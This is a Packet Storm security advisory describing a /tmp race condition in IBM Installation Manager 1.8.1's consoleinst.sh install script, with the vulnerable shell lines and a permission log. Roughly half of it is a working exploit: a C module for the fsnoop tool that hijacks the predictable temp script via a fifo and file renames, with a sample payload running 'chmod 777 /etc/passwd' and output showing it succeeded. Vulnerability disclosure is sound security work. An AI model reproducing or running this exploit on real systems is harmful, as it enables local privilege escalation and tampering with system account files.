IBM Installation Manager 1.8.1 Race Condition

2015-11-12T00:00:00
ID PACKETSTORM:134311
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-11-12T00:00:00

Description

                                        
                                            `Title: /tmp race condition in IBM Installation Manager V1.8.1 install script  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-10-29  
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev  
Vendor: IBM  
Vendor Notified: 0000-00-00  
Vendor Contact:  
Description: IBM Installation Manager is a command line utility to install  
various software packages developed by IBM.  
  
=====> IBM Installation Manager> Password required  
  
Credentials are required to connect to the IBM download site. Enter IBM ID  
and password.  
  
Select:  
P. Provide credentials and connect  
C. Cancel  
  
Select 'P' to enter credentials and connect, or 'C' to cancel.  
  
Forgot your IBM ID?  
https://www.ibm.com/account/profile?page=forgotuid  
Forgot your password?  
https://www.ibm.com/account/profile?page=forgot  
IBM ID help and FAQ  
https://www.ibm.com/account/profile/us/en?page=regfaqhelp  
-----> C  
Vulnerability:  
I noticed a /tmp race condition in IBM¹s installation manager software  
install script  
The code in consoleinst.sh is:  
  
  
46 TEMP=/tmp  
47 tempScript=$TEMP/consoleinst-$$.sh  
48 scriptLoc=`dirname "$0"`  
49 slash=`expr "$scriptLoc" : "\(/\)"`  
50 if [ "X$slash" != "X/" ]; then  
51 scriptLoc=`pwd`/$scriptLoc  
52 fi  
53   
54 if [ "$0" != "$tempScript" ]; then  
55 cp "$0" "$tempScript"  
56 cd "$TEMP"  
57 origScriptLoc=$scriptLoc  
58 export origScriptLoc  
59 exec "$tempScript" $@  
60 # should not return from above exec  
61 exit 1  
62 fi  
  
  
If you guess the pid and create the file before the installer script does  
you can inject code to be executed at line 59.  
  
This is a log of me controlling permissions of the file during installation  
of the product:  
  
[M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015  
/tmp/consoleinst-9999.sh  
[U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015  
/tmp/consoleinst-10382.sh  
[U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015  
/tmp/consoleinst-10382.sh  
  
If I'm able to write to that file directly after it's modifed (inotify() for  
the win) I could inject commands into that installation script.  
CVEID:  
OSVDB:  
Exploit Code:  
/*  
fsnoop v3.3 module for exploitation of:  
http://www.vapidlabs.com/advisory.php?v=156  
special thanks to v14dz for getting this working, and Mudge @dotmudge for  
pointing me  
at his /tmp race condition tool l0pht-watch.  
  
@v14dz  
http://vladz.devzero.fr/  
  
$ make ibm-console.so  
  
/tmp/x is :  
  
#!/bin/sh  
chmod 777 /etc/passwd  
  
$ ./fsnoop -p ibm-consoleinst.so  
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **  
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]  
file=[/tmp/consoleinst-HEREPID.sh]  
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"  
[+] ./ibm-consoleinst.so: Exploitation done.  
[+] ./ibm-consoleinst.so: Unloading module.  
  
ls -l /etc/passwd  
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd  
  
*/  
  
  
  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
  
char title[] = "** IBM Console Install Exploit **";  
  
/* filters */  
char proc_name[] = "/bin/sh ./consoleinst.sh";  
char file[] = "/tmp/consoleinst-HEREPID.sh";  
  
/* Evil routines */  
void payload() {   
int fd;  
/*from v14dz: I use a fifo here, to unlock the paymod execution right after  
the cp command*/  
mkfifo(file, 0666);  
fd = open(file, O_RDONLY);  
rename(file, "/tmp/a");  
rename("/tmp/x", file);  
}  
Screen Shots:  
Advisory: http://www.vapidlabs.com/advisory.php?v=156  
  
  
`